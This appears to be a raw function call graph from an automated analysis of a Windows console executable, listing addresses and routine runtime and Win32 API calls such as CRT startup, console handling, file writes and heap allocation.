38941->38942 38943 7ff623e07ebf 38942->38943 38944 7ff623de3f18 70 API calls 38942->38944 38945 7ff623de4d1c 157 API calls 38943->38945 38944->38943 38946 7ff623e07ed6 38945->38946 38947 7ff623e07eef 38946->38947 38949 7ff623de6ad0 154 API calls 38946->38949 38948 7ff623de4d1c 157 API calls 38947->38948 38950 7ff623e07eff 38948->38950 38951 7ff623e07ee7 38949->38951 38952 7ff623e07f0d 38950->38952 38955 7ff623e07f14 38950->38955 38953 7ff623de4e48 160 API calls 38951->38953 38954 7ff623e1b650 CreateEventW CloseHandle CreateEventW GetLastError CloseHandle 38952->38954 38953->38947 38954->38955 38956 7ff623de4888 58 API calls 38955->38956 38957 7ff623e07f57 38956->38957 38958 7ff623de4fd0 268 API calls 38957->38958 38959 7ff623e07f5f 38958->38959 38960 7ff623e07f9e 38959->38960 38961 7ff623e07f8c 38959->38961 38965 7ff623e2b684 GetModuleHandleW 38960->38965 38962 7ff623e1b650 CreateEventW CloseHandle CreateEventW GetLastError CloseHandle 38961->38962 38963 7ff623e07f93 38962->38963 38963->38960 38964 7ff623e1b57c 14 API calls 38963->38964 38964->38960 38966 7ff623e2b698 38965->38966 38966->38909 38967->38898 38968->38897 38969->38902 38970->38911 38972 7ff623e2e301 __vcrt_initialize_pure_virtual_call_handler __vcrt_initialize_winapi_thunks 38971->38972 38984 7ff623e2eb08 38972->38984 38975 7ff623e2aab3 38975->38918 38979 7ff623e345e4 38975->38979 38977 7ff623e2e318 38977->38975 38991 7ff623e2eb50 DeleteCriticalSection 38977->38991 38981 7ff623e39d4c 38979->38981 38980 7ff623e2aac0 38980->38918 38983 7ff623e2e32c 8 API calls 3 library calls 38980->38983 38981->38980 39008 7ff623e366c0 38981->39008 38983->38918 38985 7ff623e2eb10 38984->38985 38987 7ff623e2eb41 38985->38987 38988 7ff623e2e30b 38985->38988 38992 7ff623e2e678 38985->38992 38997 7ff623e2eb50 DeleteCriticalSection 38987->38997 38988->38975 38990 7ff623e2e8a4 8 API calls 3 library calls 38988->38990 38990->38977 38991->38975 38998 7ff623e2e34c 38992->38998 38995 7ff623e2e6cf InitializeCriticalSectionAndSpinCount 38996 7ff623e2e6bb 38995->38996 38996->38985 38997->38988 38999 7ff623e2e3b2 38998->38999 39003 7ff623e2e3ad 38998->39003 38999->38995 38999->38996 39000 7ff623e2e3e5 LoadLibraryExW 39000->39003 39004 7ff623e2e40b GetLastError 39000->39004 39001 7ff623e2e47a 39001->38999 39002 7ff623e2e489 GetProcAddress 39001->39002 39002->38999 39005 7ff623e2e4a1 39002->39005 39003->38999 39003->39000 39003->39001 39007 7ff623e2e458 FreeLibrary 39003->39007 39004->39003 39006 7ff623e2e416 LoadLibraryExW 39004->39006 39005->38999 39006->39003 39007->39003 39019 7ff623e36938 EnterCriticalSection 39008->39019 39010 7ff623e366d0 39011 7ff623e38050 32 API calls 39010->39011 39012 7ff623e366d9 39011->39012 39013 7ff623e364d0 34 API calls 39012->39013 39018 7ff623e366e7 39012->39018 39015 7ff623e366e2 39013->39015 39014 7ff623e36998 abort LeaveCriticalSection 39016 7ff623e366f3 39014->39016 39017 7ff623e365bc GetStdHandle GetFileType 39015->39017 39016->38981 39017->39018 39018->39014 39021 7ff623e2b020 pre_c_initialization 39020->39021 39041 7ff623e32b00 39021->39041 39023 7ff623e2b02c pre_c_initialization 39047 7ff623e2aad8 39023->39047 39025 7ff623e2b045 39026 7ff623e2b049 _RTC_Initialize 39025->39026 39027 7ff623e2b0b5 39025->39027 39052 7ff623e2ace0 39026->39052 39084 7ff623e2b52c 7 API calls __scrt_fastfail 39027->39084 39029 7ff623e2b0bf 39085 7ff623e2b52c 7 API calls __scrt_fastfail 39029->39085 39031 7ff623e2b05a pre_c_initialization 39055 7ff623e33b0c 39031->39055 39033 7ff623e2b0ca __scrt_initialize_default_local_stdio_options 39033->38922 39036 7ff623e2b06a 39083 7ff623e2b7dc RtlInitializeSListHead 39036->39083 39038 7ff623e2b06f __CxxCallCatchBlock pre_c_initialization 39039 7ff623e34818 pre_c_initialization 35 API calls 39038->39039 39040 7ff623e2b09a pre_c_initialization 39039->39040 39040->38922 39042 7ff623e32b11 39041->39042 39043 7ff623e32b19 39042->39043 39086 7ff623e34f3c 15 API calls _set_errno_from_matherr 39042->39086 39043->39023 39045 7ff623e32b28 39087 7ff623e34e1c 31 API calls _invalid_parameter_noinfo 39045->39087 39048 7ff623e2ab96 39047->39048 39051 7ff623e2aaf0 __scrt_initialize_onexit_tables __scrt_release_startup_lock 39047->39051 39088 7ff623e2b52c 7 API calls __scrt_fastfail 39048->39088 39050 7ff623e2aba0 39051->39025 39089 7ff623e2ac90 39052->39089 39054 7ff623e2ace9 39054->39031 39056 7ff623e33b2a 39055->39056 39057 7ff623e33b40 39055->39057 39094 7ff623e34f3c 15 API calls _set_errno_from_matherr 39056->39094 39096 7ff623e39370 39057->39096 39060 7ff623e33b2f 39095 7ff623e34e1c 31 API calls _invalid_parameter_noinfo 39060->39095 39063 7ff623e33b72 39100 7ff623e338ec 35 API calls pre_c_initialization 39063->39100 39064 7ff623e2b066 39064->39029 39064->39036 39066 7ff623e33b9c 39101 7ff623e33aa8 15 API calls 2 library calls 39066->39101 39068 7ff623e33bb2 39069 7ff623e33bba 39068->39069 39070 7ff623e33bcb 39068->39070 39102 7ff623e34f3c 15 API calls _set_errno_from_matherr 39069->39102 39103 7ff623e338ec 35 API calls pre_c_initialization 39070->39103 39073 7ff623e34a74 Concurrency::details::SchedulerProxy::DeleteThis 15 API calls 39073->39064 39074 7ff623e33be7 39075 7ff623e33c17 39074->39075 39076 7ff623e33c30 39074->39076 39081 7ff623e33bbf 39074->39081 39104 7ff623e34a74 39075->39104 39078 7ff623e34a74 Concurrency::details::SchedulerProxy::DeleteThis 15 API calls 39076->39078 39078->39081 39079 7ff623e33c20 39080 7ff623e34a74 Concurrency::details::SchedulerProxy::DeleteThis 15 API calls 39079->39080 39082 7ff623e33c2c 39080->39082 39081->39073 39082->39064 39084->39029 39085->39033 39086->39045 39087->39043 39088->39050 39090 7ff623e2acbf 39089->39090 39092 7ff623e2acb5 _onexit 39089->39092 39093 7ff623e34434 34 API calls _onexit 39090->39093 39092->39054 39093->39092 39094->39060 39095->39064 39097 7ff623e3937d 39096->39097 39098 7ff623e33b45 GetModuleFileNameA 39096->39098 39110 7ff623e391b0 48 API calls 5 library calls 39097->39110 39098->39063 39100->39066 39101->39068 39102->39081 39103->39074 39105 7ff623e34a79 RtlFreeHeap 39104->39105 39109 7ff623e34aa9 Concurrency::details::SchedulerProxy::DeleteThis 39104->39109 39106 7ff623e34a94 39105->39106 39105->39109 39111 7ff623e34f3c 15 API calls _set_errno_from_matherr 39106->39111 39108 7ff623e34a99 GetLastError 39108->39109 39109->39079 39110->39098 39111->39108 39113 7ff623e33c98 39112->39113 39114 7ff623e33ca1 39112->39114 39113->39114 39118 7ff623e33ccc 39113->39118 39114->38925 39119 7ff623e33ce5 39118->39119 39127 7ff623e33caa 39118->39127 39120 7ff623e39370 pre_c_initialization 48 API calls 39119->39120 39121 7ff623e33cea 39120->39121 39131 7ff623e3978c GetEnvironmentStringsW 39121->39131 39124 7ff623e33cf7 39126 7ff623e34a74 Concurrency::details::SchedulerProxy::DeleteThis 15 API calls 39124->39126 39126->39127 39127->39114 39130 7ff623e33e78 17 API calls 2 library calls 39127->39130 39128 7ff623e33d04 39129 7ff623e34a74 Concurrency::details::SchedulerProxy::DeleteThis 15 API calls 39128->39129 39129->39124 39130->39114 39132 7ff623e397ba WideCharToMultiByte 39131->39132 39133 7ff623e3985e 39131->39133 39132->39133 39135 7ff623e39814 39132->39135 39136 7ff623e39868 FreeEnvironmentStringsW 39133->39136 39137 7ff623e33cef 39133->39137 39144 7ff623e34ab4 39135->39144 39136->39137 39137->39124 39143 7ff623e33d38 31 API calls 4 library calls 39137->39143 39140 7ff623e39824 WideCharToMultiByte 39141 7ff623e3984b 39140->39141 39142 7ff623e34a74 Concurrency::details::SchedulerProxy::DeleteThis 15 API calls 39141->39142 39142->39133 39143->39128 39145 7ff623e34aff 39144->39145 39149 7ff623e34ac3 __vcrt_getptd_noexit 39144->39149 39151 7ff623e34f3c 15 API calls _set_errno_from_matherr 39145->39151 39146 7ff623e34ae6 RtlAllocateHeap 39148 7ff623e34afd 39146->39148 39146->39149 39148->39140 39148->39141 39149->39145 39149->39146 39150 7ff623e336c0 new 2 API calls 39149->39150 39150->39149 39151->39148 39153 7ff623e1b496 GetProcAddress 39152->39153 39154 7ff623e07e45 39152->39154 39155 7ff623e1b4cb GetProcAddress 39153->39155 39156 7ff623e1b4ae 39153->39156 39157 7ff623de7a68 39154->39157 39155->39154 39156->39155 39158 7ff623de7a76 39157->39158 39178 7ff623e32ae4 39158->39178 39160 7ff623de7a80 39161 7ff623e32ae4 setbuf 60 API calls 39160->39161 39162 7ff623de7a94 39161->39162 39187 7ff623de7b44 GetStdHandle GetFileType 39162->39187 39165 7ff623de7b44 3 API calls 39166 7ff623de7aae 39165->39166 39167 7ff623de7b44 3 API calls 39166->39167 39170 7ff623de7abe 39167->39170 39168 7ff623de7aeb 39169 7ff623de7b12 39168->39169 39192 7ff623e32abc 31 API calls 2 library calls 39168->39192 39177 7ff623decd78 SetConsoleCtrlHandler 39169->39177 39170->39168 39190 7ff623e32abc 31 API calls 2 library calls 39170->39190 39173 7ff623de7adf 39191 7ff623e32b40 33 API calls 3 library calls 39173->39191 39175 7ff623de7b06 39193 7ff623e32b40 33 API calls 3 library calls 39175->39193 39179 7ff623e32ae9 39178->39179 39180 7ff623e37ee8 39179->39180 39183 7ff623e37f23 39179->39183 39194 7ff623e34f3c 15 API calls _set_errno_from_matherr 39180->39194 39182 7ff623e37eed 39195 7ff623e34e1c 31 API calls _invalid_parameter_noinfo 39182->39195 39196 7ff623e37d98 60 API calls 2 library calls 39183->39196 39186 7ff623e37ef8 39186->39160 39188 7ff623de7a9e 39187->39188 39189 7ff623de7b61 GetConsoleMode 39187->39189 39188->39165 39189->39188 39190->39173 39191->39168 39192->39175 39193->39169 39194->39182 39195->39186 39196->39186 39197 7ff623dd82f0 39198 7ff623dd8306 39197->39198 39211 7ff623dd836f 39197->39211 39199 7ff623dd8324 39198->39199 39202 7ff623dd8371 39198->39202 39198->39211 39317 7ff623df2414 61 API calls 39199->39317 39201 7ff623dd8347 39318 7ff623df1998 138 API calls 39201->39318 39202->39211 39319 7ff623df1998 138 API calls 39202->39319 39205 7ff623dd835e 39206 7ff623df18ac 15 API calls 39205->39206 39206->39211 39210 7ff623dd8578 39212 7ff623ddb540 147 API calls 39210->39212 39220 7ff623dda410 39211->39220 39214 7ff623dd858f 39212->39214 39213 7ff623ddb540 147 API calls 39213->39210 39218 7ff623dd8634 39214->39218 39320 7ff623dd9628 175 API calls 39214->39320 39215 7ff623e2a610 _handle_error 8 API calls 39216 7ff623dd8663 39215->39216 39218->39215 39321 7ff623e07a68 39220->39321 39223 7ff623dd853a 39225 7ff623ddb540 39223->39225 39229 7ff623ddb55f setbuf 39225->39229 39226 7ff623ddb5a1 39227 7ff623ddb5d8 39226->39227 39228 7ff623ddb5b8 39226->39228 39469 7ff623e08c1c 39227->39469 39355 7ff623ddaba0 39228->39355 39229->39226 39351 7ff623dda4d0 39229->39351 39232 7ff623e2a610 _handle_error 8 API calls 39233 7ff623dd854f 39232->39233 39233->39210 39233->39213 39234 7ff623ddb67f 39235 7ff623ddbc91 39234->39235 39237 7ff623ddb6a5 39234->39237 39238 7ff623ddbbae 39234->39238 39236 7ff623ddb5d3 39235->39236 39239 7ff623df2574 126 API calls 39235->39239 39236->39232 39237->39236 39248 7ff623ddb6b5 39237->39248 39267 7ff623ddb79f 39237->39267 39240 7ff623e08d00 48 API calls 39238->39240 39239->39236 39242 7ff623ddbc5c 39240->39242 39538 7ff623e08d38 48 API calls 39242->39538 39246 7ff623ddbc69 39539 7ff623e08d38 48 API calls 39246->39539 39248->39236 39503 7ff623e08d00 39248->39503 39250 7ff623ddbc76 39540 7ff623e08d38 48 API calls 39250->39540 39252 7ff623ddbc84 39541 7ff623e08d88 48 API calls 39252->39541 39257 7ff623ddb726 39507 7ff623e08d38 48 API calls 39257->39507 39259 7ff623ddb733 39260 7ff623ddb749 39259->39260 39508 7ff623e08d88 48 API calls 39259->39508 39262 7ff623ddb75c 39260->39262 39509 7ff623e08d38 48 API calls 39260->39509 39264 7ff623ddb779 39262->39264 39266 7ff623e08d00 48 API calls 39262->39266 39510 7ff623e08f94 39264->39510 39266->39262 39268 7ff623ddb8e5 39267->39268 39520 7ff623ddc3c8 CharLowerW CharUpperW 39267->39520 39521 7ff623e1d840 WideCharToMultiByte 39268->39521 39272 7ff623ddb9a1 39273 7ff623e08d00 48 API calls 39272->39273 39275 7ff623ddb9c4 39273->39275 39524 7ff623e08d38 48 API calls 39275->39524 39276 7ff623ddb910 39276->39272 39523 7ff623dd945c 55 API calls _handle_error 39276->39523 39278 7ff623ddb9d1 39525 7ff623e08d38 48 API calls 39278->39525 39280 7ff623ddb9de 39526 7ff623e08d88 48 API calls 39280->39526 39282 7ff623ddb9eb 39527 7ff623e08d88 48 API calls 39282->39527 39284 7ff623ddba0b 39285 7ff623e08d00 48 API calls 39284->39285 39286 7ff623ddba27 39285->39286 39528 7ff623e08d88 48 API calls 39286->39528 39288 7ff623ddba37 39289 7ff623ddba49 39288->39289 39529 7ff623e1bc48 15 API calls 39288->39529 39530 7ff623e08d88 48 API calls 39289->39530 39292 7ff623ddba59 39293 7ff623e08d00 48 API calls 39292->39293 39294 7ff623ddba66 39293->39294 39295 7ff623e08d00 48 API calls 39294->39295 39296 7ff623ddba78 39295->39296 39531 7ff623e08d38 48 API calls 39296->39531 39298 7ff623ddba85 39532 7ff623e08d88 48 API calls 39298->39532 39300 7ff623ddba92 39301 7ff623ddbacd 39300->39301 39533 7ff623e08d88 48 API calls 39300->39533 39535 7ff623e08e3c 39301->39535 39303 7ff623ddbab2 39534 7ff623e08d88 48 API calls 39303->39534 39306 7ff623ddbb33 39309 7ff623ddbb53 39306->39309 39312 7ff623e08e3c 48 API calls 39306->39312 39308 7ff623e08d00 48 API calls 39310 7ff623ddbb09 39308->39310 39313 7ff623ddbb6e 39309->39313 39314 7ff623e08e3c 48 API calls 39309->39314 39310->39306 39311 7ff623e08e3c 48 API calls 39310->39311 39311->39306 39312->39309 39315 7ff623e08f94 126 API calls 39313->39315 39314->39313 39315->39236 39317->39201 39318->39205 39319->39211 39320->39218 39322 7ff623e07a8d 39321->39322 39323 7ff623dda434 39321->39323 39324 7ff623e07aaf 39322->39324 39334 7ff623e07340 157 API calls 39322->39334 39323->39223 39329 7ff623df22e0 39323->39329 39324->39323 39326 7ff623df22e0 12 API calls 39324->39326 39327 7ff623e07adf 39326->39327 39335 7ff623df2440 39327->39335 39345 7ff623df20b4 39329->39345 39332 7ff623df2307 39332->39223 39334->39324 39336 7ff623df2454 39335->39336 39337 7ff623df246a SetFilePointer 39335->39337 39338 7ff623df24ad 39336->39338 39343 7ff623decd00 10 API calls 39336->39343 39337->39338 39339 7ff623df248d GetLastError 39337->39339 39338->39323 39339->39338 39341 7ff623df2497 39339->39341 39341->39338 39344 7ff623decd00 10 API calls 39341->39344 39346 7ff623df2130 39345->39346 39349 7ff623df20d0 39345->39349 39346->39332 39350 7ff623decd00 10 API calls 39346->39350 39347 7ff623df2102 SetFilePointer 39347->39346 39348 7ff623df2126 GetLastError 39347->39348 39348->39346 39349->39347 39352 7ff623dda4ea 39351->39352 39353 7ff623dda4ee 39352->39353 39354 7ff623df2440 12 API calls 39352->39354 39353->39226 39354->39353 39356 7ff623ddabbf setbuf 39355->39356 39357 7ff623e08c1c 48 API calls 39356->39357 39363 7ff623ddabf5 39357->39363 39358 7ff623ddaca7 39359 7ff623ddb4af 39358->39359 39360 7ff623ddacbf 39358->39360 39364 7ff623ddb4ff 39359->39364 39366 7ff623df2574 126 API calls 39359->39366 39361 7ff623ddb35c 39360->39361 39362 7ff623ddacc8 39360->39362 39368 7ff623e08eec 48 API calls 39361->39368 39369 7ff623ddacdd 39362->39369 39376 7ff623ddad60 39362->39376 39403 7ff623ddaea7 39362->39403 39363->39358 39363->39359 39365 7ff623de9be0 14 API calls 39363->39365 39367 7ff623e072c0 4 API calls 39364->39367 39370 7ff623ddac34 39365->39370 39366->39364 39367->39376 39371 7ff623ddb395 39368->39371 39372 7ff623ddace6 39369->39372 39373 7ff623ddad68 39369->39373 39374 7ff623de90b8 75 API calls 39370->39374 39375 7ff623ddb3ad 39371->39375 39560 7ff623dd9e2c 48 API calls 39371->39560 39372->39376 39542 7ff623e08eec 39372->39542 39379 7ff623e08eec 48 API calls 39373->39379 39378 7ff623ddac8f 39374->39378 39377 7ff623e08eec 48 API calls 39375->39377 39381 7ff623e2a610 _handle_error 8 API calls 39376->39381 39383 7ff623ddb3d4 39377->39383 39378->39358 39389 7ff623df2574 126 API calls 39378->39389 39385 7ff623ddad9c 39379->39385 39382 7ff623ddb52b 39381->39382 39382->39236 39387 7ff623ddb3e6 39383->39387 39391 7ff623e08eec 48 API calls 39383->39391 39386 7ff623e08eec 48 API calls 39385->39386 39390 7ff623ddada9 39386->39390 39394 7ff623e08eec 48 API calls 39387->39394 39389->39358 39393 7ff623e08eec 48 API calls 39390->39393 39391->39387 39392 7ff623e08eec 48 API calls 39395 7ff623ddad31 39392->39395 39396 7ff623ddadb5 39393->39396 39397 7ff623ddb451 39394->39397 39398 7ff623e08eec 48 API calls 39395->39398 39399 7ff623e08eec 48 API calls 39396->39399 39400 7ff623ddb471 39397->39400 39408 7ff623e08eec 48 API calls 39397->39408 39401 7ff623ddad46 39398->39401 39402 7ff623ddadc2 39399->39402 39405 7ff623ddb486 39400->39405 39409 7ff623e08e3c 48 API calls 39400->39409 39404 7ff623e08f94 126 API calls 39401->39404 39407 7ff623e08d00 48 API calls 39402->39407 39411 7ff623ddafda 39403->39411 39550 7ff623dd9b64 48 API calls _handle_error 39403->39550 39404->39376 39406 7ff623e08f94 126 API calls 39405->39406 39406->39376 39410 7ff623ddadcf 39407->39410 39408->39400 39409->39405 39413 7ff623de90b8 75 API calls 39410->39413 39419 7ff623ddaff2 39411->39419 39551 7ff623dd9d98 48 API calls 39411->39551 39415 7ff623ddae22 39413->39415 39416 7ff623e08e3c 48 API calls 39415->39416 39417 7ff623ddae33 39416->39417 39418 7ff623e08e3c 48 API calls 39417->39418 39422 7ff623ddae48 39418->39422 39421 7ff623ddb02b 39419->39421 39552 7ff623dd9efc 48 API calls _handle_error 39419->39552 39420 7ff623ddb0af 39425 7ff623ddb0c8 39420->39425 39554 7ff623dda1a0 48 API calls 2 library calls 39420->39554 39421->39420 39553 7ff623dda2c8 48 API calls 39421->39553 39429 7ff623e19ce4 8 API calls 39422->39429 39427 7ff623ddb0e2 39425->39427 39555 7ff623dda350 48 API calls _handle_error 39425->39555 39431 7ff623e08eec 48 API calls 39427->39431 39430 7ff623ddae60 39429->39430 39432 7ff623e19b70 8 API calls 39430->39432 39433 7ff623ddb0fc 39431->39433 39434 7ff623ddae6d 39432->39434 39435 7ff623e08eec 48 API calls 39433->39435 39436 7ff623e08e3c 48 API calls 39434->39436 39438 7ff623ddb109 39435->39438 39437 7ff623ddae80 39436->39437 39440 7ff623e08f94 126 API calls 39437->39440 39439 7ff623ddb11f 39438->39439 39441 7ff623e08eec 48 API calls 39438->39441 39546 7ff623e08e94 39439->39546 39440->39376 39441->39439 39444 7ff623e08eec 48 API calls 39445 7ff623ddb147 39444->39445 39446 7ff623e08e94 48 API calls 39445->39446 39447 7ff623ddb15f 39446->39447 39448 7ff623e08eec 48 API calls 39447->39448 39451 7ff623ddb16c 39448->39451 39449 7ff623ddb18a 39450 7ff623ddb1a9 39449->39450 39557 7ff623e08d88 48 API calls 39449->39557 39453 7ff623e08e94 48 API calls 39450->39453 39451->39449 39556 7ff623e08d88 48 API calls 39451->39556 39455 7ff623ddb1bc 39453->39455 39456 7ff623e08eec 48 API calls 39455->39456 39457 7ff623ddb1d6 39456->39457 39459 7ff623ddb1e9 39457->39459 39558 7ff623ddc3c8 CharLowerW CharUpperW 39457->39558 39459->39459 39460 7ff623e08eec 48 API calls 39459->39460 39461 7ff623ddb21f 39460->39461 39462 7ff623e08e3c 48 API calls 39461->39462 39463 7ff623ddb230 39462->39463 39464 7ff623ddb247 39463->39464 39465 7ff623e08e3c 48 API calls 39463->39465 39466 7ff623e08f94 126 API calls 39464->39466 39465->39464 39467 7ff623ddb278 39466->39467 39467->39376 39559 7ff623e070d8 4 API calls 2 library calls 39467->39559 39561 7ff623e08f28 39469->39561 39472 7ff623de90b8 39473 7ff623de9123 39472->39473 39480 7ff623de91a9 39472->39480 39473->39480 39579 7ff623e17e74 39473->39579 39475 7ff623e2a610 _handle_error 8 API calls 39477 7ff623ddb66e 39475->39477 39488 7ff623df2574 39477->39488 39478 7ff623e1d840 WideCharToMultiByte 39479 7ff623de9157 39478->39479 39479->39480 39481 7ff623de91c4 39479->39481 39482 7ff623de916a 39479->39482 39480->39475 39598 7ff623de9338 12 API calls _handle_error 39481->39598 39484 7ff623de91ab 39482->39484 39485 7ff623de916f 39482->39485 39597 7ff623de951c 71 API calls _handle_error 39484->39597 39485->39480 39583 7ff623de98b0 39485->39583 39489 7ff623df25a5 39488->39489 39490 7ff623df259e 39488->39490 39491 7ff623df25ab GetStdHandle 39489->39491 39496 7ff623df25ba 39489->39496 39490->39234 39491->39496 39492 7ff623df2619 WriteFile 39492->39496 39493 7ff623df25cf WriteFile 39494 7ff623df260b 39493->39494 39493->39496 39494->39493 39494->39496 39495 7ff623df2658 GetLastError 39495->39496 39496->39490 39496->39492 39496->39493 39496->39495 39501 7ff623df2721 39496->39501 39663 7ff623df3144 9 API calls 2 library calls 39496->39663 39664 7ff623decf34 10 API calls 39496->39664 39665 7ff623dec95c 126 API calls 39496->39665 39498 7ff623df2684 SetLastError 39498->39496 39666 7ff623decf14 10 API calls 39501->39666 39504 7ff623dd161c 48 API calls 39503->39504 39505 7ff623ddb719 39504->39505 39506 7ff623e08d38 48 API calls 39505->39506 39506->39257 39507->39259 39508->39260 39509->39262 39511 7ff623e09131 39510->39511 39512 7ff623e08fcf 39510->39512 39511->39236 39513 7ff623e0905d 39512->39513 39667 7ff623deca6c 48 API calls 3 library calls 39512->39667 39515 7ff623dd161c 48 API calls 39513->39515 39516 7ff623e090e0 39513->39516 39514 7ff623df2574 126 API calls 39514->39511 39515->39516 39516->39511 39516->39514 39518 7ff623e0904c 39668 7ff623deca40 61 API calls _CxxThrowException 39518->39668 39520->39268 39522 7ff623ddb8f8 CharToOemA 39521->39522 39522->39276 39523->39272 39524->39278 39525->39280 39526->39282 39527->39284 39528->39288 39529->39289 39530->39292 39531->39298 39532->39300 39533->39303 39534->39301 39536 7ff623dd161c 48 API calls 39535->39536 39537 7ff623ddbaf2 39536->39537 39537->39306 39537->39308 39537->39310 39538->39246 39539->39250 39540->39252 39541->39235 39543 7ff623e08efc 39542->39543 39544 7ff623e08d00 48 API calls 39543->39544 39545 7ff623ddad24 39543->39545 39544->39543 39545->39392 39547 7ff623e08eac 39546->39547 39548 7ff623e08d00 48 API calls 39547->39548 39549 7ff623ddb137 39547->39549 39548->39547 39549->39444 39550->39411 39551->39419 39552->39421 39553->39420 39554->39425 39555->39427 39556->39449 39557->39450 39558->39459 39559->39376 39560->39375 39564 7ff623dd161c 39561->39564 39563 7ff623ddb601 39563->39234 39563->39235 39563->39472 39565 7ff623dd1640 39564->39565 39574 7ff623dd16aa __BuildCatchObjectHelper 39564->39574 39566 7ff623dd166d 39565->39566 39575 7ff623deca6c 48 API calls 3 library calls 39565->39575 39568 7ff623dd16d4 39566->39568 39569 7ff623dd168e 39566->39569 39568->39574 39578 7ff623decb64 8 API calls 39568->39578 39569->39574 39577 7ff623decb64 8 API calls 39569->39577 39570 7ff623dd1661 39576 7ff623decb64 8 API calls 39570->39576 39574->39563 39575->39570 39580 7ff623e17e95 39579->39580 39582 7ff623de9143 39579->39582 39581 7ff623e17ec8 68 API calls 39580->39581 39581->39582 39582->39478 39587 7ff623de9920 39583->39587 39593 7ff623de9b45 39583->39593 39584 7ff623e2a610 _handle_error 8 API calls 39585 7ff623de9b61 39584->39585 39585->39480 39588 7ff623de996d 39587->39588 39589 7ff623de9b75 39587->39589 39599 7ff623e17da8 39587->39599 39588->39588 39606 7ff623dea0f4 39588->39606 39590 7ff623e17f24 68 API calls 39589->39590 39594 7ff623de9acb 39590->39594 39592 7ff623de99d0 39622 7ff623e17f24 39592->39622 39593->39584 39594->39593 39636 7ff623e14ea8 8 API calls _handle_error 39594->39636 39597->39480 39598->39480 39600 7ff623e17e74 68 API calls 39599->39600 39601 7ff623e17ddc 39600->39601 39602 7ff623e17e74 68 API calls 39601->39602 39603 7ff623e17def 39602->39603 39604 7ff623e2a610 _handle_error 8 API calls 39603->39604 39605 7ff623e17e43 39604->39605 39605->39587 39609 7ff623dea15c __BuildCatchObjectHelper 39606->39609 39607 7ff623dea358 39659 7ff623e2a774 8 API calls __report_securityfailure 39607->39659 39608 7ff623dea352 39658 7ff623e2a774 8 API calls __report_securityfailure 39608->39658 39609->39607 39609->39608 39612 7ff623dea192 39609->39612 39613 7ff623dea34d 39609->39613 39611 7ff623dea35e 39637 7ff623de9dd8 39612->39637 39657 7ff623e2a774 8 API calls __report_securityfailure 39613->39657 39617 7ff623dea1d9 39618 7ff623de9dd8 8 API calls 39617->39618 39619 7ff623dea2f1 39617->39619 39618->39617 39620 7ff623e2a610 _handle_error 8 API calls 39619->39620 39621 7ff623dea33b 39620->39621 39621->39592 39623 7ff623e17f5e 39622->39623 39629 7ff623e17fb5 39622->39629 39624 7ff623e1b3f0 10 API calls 39623->39624 39623->39629 39625 7ff623e17f72 39624->39625 39628 7ff623e17f7e GetProcAddressForCaller GetProcAddress 39625->39628 39625->39629 39626 7ff623e1805c GetCurrentProcessId 39627 7ff623e18034 39626->39627 39627->39594 39628->39629 39629->39626 39630 7ff623e17ff1 39629->39630 39630->39627 39660 7ff623deca6c 48 API calls 3 library calls 39630->39660 39632 7ff623e1801f 39661 7ff623decda4 10 API calls 2 library calls 39632->39661 39634 7ff623e18027 39662 7ff623deca40 61 API calls _CxxThrowException 39634->39662 39636->39593 39638 7ff623de9e46 39637->39638 39642 7ff623de9e6e __scrt_fastfail 39637->39642 39639 7ff623e19ce4 8 API calls 39638->39639 39640 7ff623de9e5e 39639->39640 39643 7ff623e19b70 8 API calls 39640->39643 39641 7ff623de9e85 39644 7ff623e19ce4 8 API calls 39641->39644 39642->39641 39645 7ff623e19ce4 8 API calls 39642->39645 39643->39642 39646 7ff623de9f97 39644->39646 39645->39641 39647 7ff623e19b70 8 API calls 39646->39647 39648 7ff623de9fa8 __scrt_fastfail 39647->39648 39649 7ff623de9fb4 39648->39649 39652 7ff623e19ce4 8 API calls 39648->39652 39650 7ff623e19ce4 8 API calls 39649->39650 39651 7ff623dea0bb 39650->39651 39653 7ff623e19b70 8 API calls 39651->39653 39652->39649 39654 7ff623dea0c9 39653->39654 39655 7ff623e2a610 _handle_error 8 API calls 39654->39655 39656 7ff623dea0d8 39655->39656 39656->39617 39657->39608 39658->39607 39659->39611 39660->39632 39661->39634 39662->39627 39663->39498 39665->39496 39667->39518 39668->39513 39669 7ff623dd3e71 39670 7ff623dd3e81 39669->39670 39671 7ff623dd3e89 39669->39671 39670->39671 39680 7ff623e29a14 49 API calls 39670->39680 39673 7ff623dd3edd 39671->39673 39674 7ff623dd3ea3 39671->39674 39676 7ff623e2a610 _handle_error 8 API calls 39673->39676 39681 7ff623df331c 48 API calls 2 library calls 39674->39681 39677 7ff623dd3eef 39676->39677 39678 7ff623dd3eab 39678->39673 39682 7ff623dd63e8 8 API calls 2 library calls 39678->39682 39680->39671 39681->39678 39682->39673 39683 7ff623e32450 39690 7ff623e33734 39683->39690 39685 7ff623e32455 39686 7ff623e36998 abort LeaveCriticalSection 39685->39686 39687 7ff623e32460 39686->39687 39688 7ff623e32488 11 API calls 39687->39688 39689 7ff623e3246c 39687->39689 39688->39689 39695 7ff623e35630 GetLastError 39690->39695 39693 7ff623e3373f 39715 7ff623e34a1c 35 API calls abort 39693->39715 39696 7ff623e3564d 39695->39696 39697 7ff623e35652 39695->39697 39716 7ff623e36cf4 6 API calls __vcrt_uninitialize_ptd 39696->39716 39701 7ff623e3569b 39697->39701 39717 7ff623e34b14 15 API calls 3 library calls 39697->39717 39700 7ff623e35669 39702 7ff623e35671 39700->39702 39718 7ff623e36d4c 6 API calls __vcrt_uninitialize_ptd 39700->39718 39704 7ff623e356b6 SetLastError 39701->39704 39705 7ff623e356a0 SetLastError 39701->39705 39708 7ff623e34a74 Concurrency::details::SchedulerProxy::DeleteThis 15 API calls 39702->39708 39720 7ff623e34a1c 35 API calls abort 39704->39720 39705->39693 39706 7ff623e35688 39706->39702 39710 7ff623e3568f 39706->39710 39709 7ff623e35678 39708->39709 39709->39704 39719 7ff623e353e0 15 API calls FindHandlerForForeignException 39710->39719 39713 7ff623e35694 39714 7ff623e34a74 Concurrency::details::SchedulerProxy::DeleteThis 15 API calls 39713->39714 39714->39701 39716->39697 39717->39700 39718->39706 39719->39713 39721 7ff623dd7a5b 39722 7ff623dd7a60 39721->39722 39723 7ff623de9be0 14 API calls 39722->39723 39725 7ff623dd7af7 39722->39725 39723->39725 39724 7ff623dd7bda 39727 7ff623ddb540 147 API calls 39724->39727 39725->39724 39754 7ff623df1e1c GetFileTime 39725->39754 39728 7ff623dd7bf8 39727->39728 39731 7ff623dd7c3e 39728->39731 39755 7ff623e29b98 216 API calls 3 library calls 39728->39755 39730 7ff623ddb540 147 API calls 39733 7ff623dd7c9c 